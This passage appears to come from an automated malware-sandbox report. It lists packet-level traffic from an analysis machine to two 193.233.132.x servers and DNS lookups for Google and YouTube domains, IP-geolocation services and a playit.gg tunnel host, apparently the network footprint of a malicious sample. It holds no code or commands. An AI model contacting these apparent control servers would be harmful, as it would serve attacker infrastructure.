                                                                                                                                                                                                                                      Apr 19, 2024 03:29:15.448436022 CEST8049719193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:15.448540926 CEST4971980192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:15.465560913 CEST4972180192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:15.711323023 CEST8049721193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:15.715399981 CEST8049721193.233.132.56192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:15.717253923 CEST4972180192.168.2.5193.233.132.56
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:15.719224930 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:15.719477892 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:15.961102009 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:15.962129116 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:15.962213993 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:15.962253094 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:15.978332996 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.220956087 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221138000 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221177101 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221215963 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221218109 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221254110 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221287966 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221287966 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221295118 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221323967 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221333981 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221338987 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221373081 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221386909 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221410990 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221440077 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221448898 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221477032 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221488953 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221493006 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.221548080 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.464555979 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.464627028 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.464638948 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.464682102 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.464714050 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.464724064 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.464724064 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.464765072 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.464767933 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.464806080 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.464816093 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.464844942 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.464848995 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.464884996 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.464891911 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.464925051 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.464930058 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.464967012 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.464971066 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465008974 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465014935 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465048075 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465054035 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465086937 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465092897 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465126038 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465128899 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465168953 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465173006 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465209007 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465213060 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465249062 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465253115 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465287924 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465291977 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465328932 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465332031 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465372086 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465375900 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465416908 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708439112 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708462000 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708481073 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708498955 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708498001 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708515882 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708528996 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708534956 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708553076 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708570004 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708570957 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708580971 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708587885 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708607912 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708611012 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708625078 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708628893 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708646059 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708662987 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708663940 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708673954 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708683968 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708687067 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708703995 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708708048 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708725929 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708738089 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708744049 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708762884 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708765030 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708780050 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708781958 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708797932 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708805084 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708817959 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708822012 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708837032 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708837986 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708856106 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708857059 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708873987 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708878994 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708893061 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708893061 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708910942 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708914995 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708930016 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708933115 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708946943 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708946943 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708971024 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708975077 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708986998 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708992958 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709011078 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709016085 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709028959 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709028959 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709048986 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709048986 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709065914 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709065914 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709085941 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709089041 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709103107 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709104061 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709121943 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709122896 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709142923 CEST4972280192.168.2.5193.233.132.167

                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.631087065 CEST192.168.2.51.1.1.10x4547Standard query (0)www.youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.631237030 CEST192.168.2.51.1.1.10x9d83Standard query (0)www.youtube.com65IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:20.929791927 CEST192.168.2.51.1.1.10x1bb3Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:20.930790901 CEST192.168.2.51.1.1.10xffc6Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.300446033 CEST192.168.2.51.1.1.10xb67eStandard query (0)accounts.youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.301054001 CEST192.168.2.51.1.1.10xbe10Standard query (0)accounts.youtube.com65IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:24.697052956 CEST192.168.2.51.1.1.10xb256Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:25.274893999 CEST192.168.2.51.1.1.10xd206Standard query (0)db-ip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.740859985 CEST192.168.2.51.1.1.10x32a1Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.741161108 CEST192.168.2.51.1.1.10x6a5Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:48.170654058 CEST192.168.2.51.1.1.10x216Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:52.652167082 CEST192.168.2.51.1.1.10x206eStandard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:52.652417898 CEST192.168.2.51.1.1.10x97bcStandard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:06.646387100 CEST192.168.2.51.1.1.10xf8f4Standard query (0)b-stamps.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:20.953000069 CEST192.168.2.51.1.1.10xf3acStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:20.954009056 CEST192.168.2.51.1.1.10xaa5bStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:33.901623964 CEST192.168.2.51.1.1.10xfe73Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:25.902829885 CEST192.168.2.51.1.1.10x4425Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:28.182463884 CEST192.168.2.51.1.1.10x14f1Standard query (0)api.ip.sbA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.735898018 CEST1.1.1.1192.168.2.50x9d83No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.735898018 CEST1.1.1.1192.168.2.50x9d83No error (0)youtube-ui.l.google.com65IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com64.233.185.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com74.125.138.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com173.194.219.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com74.125.138.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com173.194.219.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com64.233.177.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com64.233.185.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com64.233.185.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com64.233.177.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com74.125.138.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com173.194.219.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com142.251.15.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com64.233.185.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com142.251.15.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com74.125.138.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com173.194.219.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:21.034960985 CEST1.1.1.1192.168.2.50x1bb3No error (0)www.google.com142.250.9.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:21.034960985 CEST1.1.1.1192.168.2.50x1bb3No error (0)www.google.com142.250.9.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:21.034960985 CEST1.1.1.1192.168.2.50x1bb3No error (0)www.google.com142.250.9.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:21.034960985 CEST1.1.1.1192.168.2.50x1bb3No error (0)www.google.com142.250.9.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:21.034960985 CEST1.1.1.1192.168.2.50x1bb3No error (0)www.google.com142.250.9.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:21.034960985 CEST1.1.1.1192.168.2.50x1bb3No error (0)www.google.com142.250.9.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:21.035022974 CEST1.1.1.1192.168.2.50xffc6No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.405831099 CEST1.1.1.1192.168.2.50xb67eNo error (0)accounts.youtube.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.405831099 CEST1.1.1.1192.168.2.50xb67eNo error (0)www3.l.google.com108.177.122.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.405831099 CEST1.1.1.1192.168.2.50xb67eNo error (0)www3.l.google.com108.177.122.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.405831099 CEST1.1.1.1192.168.2.50xb67eNo error (0)www3.l.google.com108.177.122.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.405831099 CEST1.1.1.1192.168.2.50xb67eNo error (0)www3.l.google.com108.177.122.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.405831099 CEST1.1.1.1192.168.2.50xb67eNo error (0)www3.l.google.com108.177.122.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.405831099 CEST1.1.1.1192.168.2.50xb67eNo error (0)www3.l.google.com108.177.122.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.406708002 CEST1.1.1.1192.168.2.50xbe10No error (0)accounts.youtube.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:24.801657915 CEST1.1.1.1192.168.2.50xb256No error (0)ipinfo.io34.117.186.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:25.381839991 CEST1.1.1.1192.168.2.50xd206No error (0)db-ip.com104.26.5.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:25.381839991 CEST1.1.1.1192.168.2.50xd206No error (0)db-ip.com172.67.75.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:25.381839991 CEST1.1.1.1192.168.2.50xd206No error (0)db-ip.com104.26.4.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.845652103 CEST1.1.1.1192.168.2.50x32a1No error (0)play.google.com74.125.138.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.845652103 CEST1.1.1.1192.168.2.50x32a1No error (0)play.google.com74.125.138.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.845652103 CEST1.1.1.1192.168.2.50x32a1No error (0)play.google.com74.125.138.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.845652103 CEST1.1.1.1192.168.2.50x32a1No error (0)play.google.com74.125.138.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.845652103 CEST1.1.1.1192.168.2.50x32a1No error (0)play.google.com74.125.138.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.845652103 CEST1.1.1.1192.168.2.50x32a1No error (0)play.google.com74.125.138.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:48.276201963 CEST1.1.1.1192.168.2.50x216No error (0)ipinfo.io34.117.186.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:52.756506920 CEST1.1.1.1192.168.2.50x206eNo error (0)play.google.com142.250.105.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:52.756506920 CEST1.1.1.1192.168.2.50x206eNo error (0)play.google.com142.250.105.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:52.756506920 CEST1.1.1.1192.168.2.50x206eNo error (0)play.google.com142.250.105.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:52.756506920 CEST1.1.1.1192.168.2.50x206eNo error (0)play.google.com142.250.105.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:52.756506920 CEST1.1.1.1192.168.2.50x206eNo error (0)play.google.com142.250.105.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:52.756506920 CEST1.1.1.1192.168.2.50x206eNo error (0)play.google.com142.250.105.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:06.983123064 CEST1.1.1.1192.168.2.50xf8f4No error (0)b-stamps.gl.at.ply.gg147.185.221.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.057634115 CEST1.1.1.1192.168.2.50xf3acNo error (0)www.google.com142.250.9.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.057634115 CEST1.1.1.1192.168.2.50xf3acNo error (0)www.google.com142.250.9.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.057634115 CEST1.1.1.1192.168.2.50xf3acNo error (0)www.google.com142.250.9.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.057634115 CEST1.1.1.1192.168.2.50xf3acNo error (0)www.google.com142.250.9.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.057634115 CEST1.1.1.1192.168.2.50xf3acNo error (0)www.google.com142.250.9.147A (IP address)IN (0x0001)false
